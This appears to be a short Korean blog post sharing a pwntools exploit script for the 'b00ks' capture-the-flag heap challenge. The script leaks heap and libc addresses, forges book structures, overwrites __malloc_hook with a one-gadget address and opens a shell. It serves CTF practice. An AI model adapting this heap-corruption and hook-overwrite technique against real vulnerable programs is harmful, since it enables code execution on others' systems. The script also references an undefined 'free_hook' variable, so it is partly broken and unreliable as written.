
간만에 풀어본 CTF문제! 재미있었다!! 모두 새해복 많이 받으세요 m(_ _)m


from pwn import *

# Target binary and the libc it is paired with (both expected in the cwd).
elf = ELF("./b00ks")
libc = ELF("./libc")
# Spawn the challenge locally; every menu helper below talks to this tube.
s = process("./b00ks")

def first(name):
    """Answer the initial "Enter author name: " prompt with *name*."""
    s.sendlineafter("Enter author name: ", name)
    


def create(size,name,dis_size,content):
    """Menu option 1: add a book.

    Sends, in prompt order, the name size, the name, the description size
    and the description text; each value is sent only after its prompt.
    """
    prompts = [
        ("> ", "1"),
        ("Enter book name size: ", str(size)),
        ("Enter book name (Max 32 chars): ", name),
        ("Enter book description size: ", str(dis_size)),
        ("Enter book description: ", content),
    ]
    for delim, data in prompts:
        s.sendlineafter(delim, data)

def delete(number):
    """Menu option 2: delete the book whose id is *number*."""
    s.sendlineafter("> ", "2")
    s.sendlineafter("Enter the book id you want to delete: ", str(number))
    

def edit(ids,disc):
    """Menu option 3: replace the description of book *ids* with *disc*."""
    s.sendlineafter("> ", "3")
    s.sendlineafter("Enter the book id you want to edit: ", str(ids))
    s.sendlineafter("Enter new book description: ", disc)
    

def show():
    """Menu option 4: request the book listing; the caller parses the output."""
    s.sendlineafter("> ", "4")
    
    

def change(name):
    """Menu option 5: set a new author name."""
    s.sendlineafter("> ", "5")
    s.sendlineafter("Enter author name: ", name)

def quit():
    """Menu option 6: exit the program.

    Shadows the builtin ``quit``; kept under this name because the script
    refers to it by that name. Not called in the sequence below.
    """
    s.sendlineafter("> ", "6")


# --- interaction sequence (Python 2: print statements, str used as bytes) ---
# Each step depends on the exact order of menu calls and on the heap/libc
# layout of the bundled binary; the statements are not reorderable.

first("K"*32)

# Book 1: 128-byte name and 128-byte description.
create(128,"1"*128,128,"A"*128)

show()

# Consume the listing up to the 32-byte author name; the 6 bytes that follow
# are zero-extended, unpacked little-endian and used as the heap reference.
s.recvuntil("K"*32)
heap = u64(s.recv(6)+"\x00\x00")
print "heap : " + hex(heap)

delete(1)

# Description payload: 80 filler bytes, then three qwords. 31337 is the id
# that edit()/delete() are called with further down; the other two are
# offsets from the value read above.
pay = "B"*(8*10)
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(heap - 0x60)
create(128,"2"*128,128,pay)
create(128,"3"*128,128,"C"*128)
create(128,"4"*128,128,"D"*128)

delete(3)

change("K"*32)

show()

# Second read: the 6 bytes after "Name: " are unpacked and treated as a
# libc pointer (see libc_base below).
s.recvuntil("Name: ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
# Hard-coded offsets tied to the ./libc loaded at the top of the script;
# only __malloc_hook is resolved from the ELF symbol table.
libc_base = leak - 0x3c4b78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_shot = libc_base + 0xf02a4
print "libc_base : " + hex(libc_base)
# NOTE: free_hook is never assigned anywhere in this script, so this line
# raises NameError as listed.
print "free_hook : " + hex(free_hook)
print "malloc_hook : " + hex(malloc_hook)
print "one_shot : " + hex(one_shot)

# Same three-qword tail as the first payload (32 filler bytes this time),
# with malloc_hook as the last qword; sent via edit() with id 31337, the
# value embedded in the earlier payload.
pay = "B"*32
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(malloc_hook)
edit(31337,pay)

edit(31337,p64(one_shot))

delete(31337)

s.interactive()

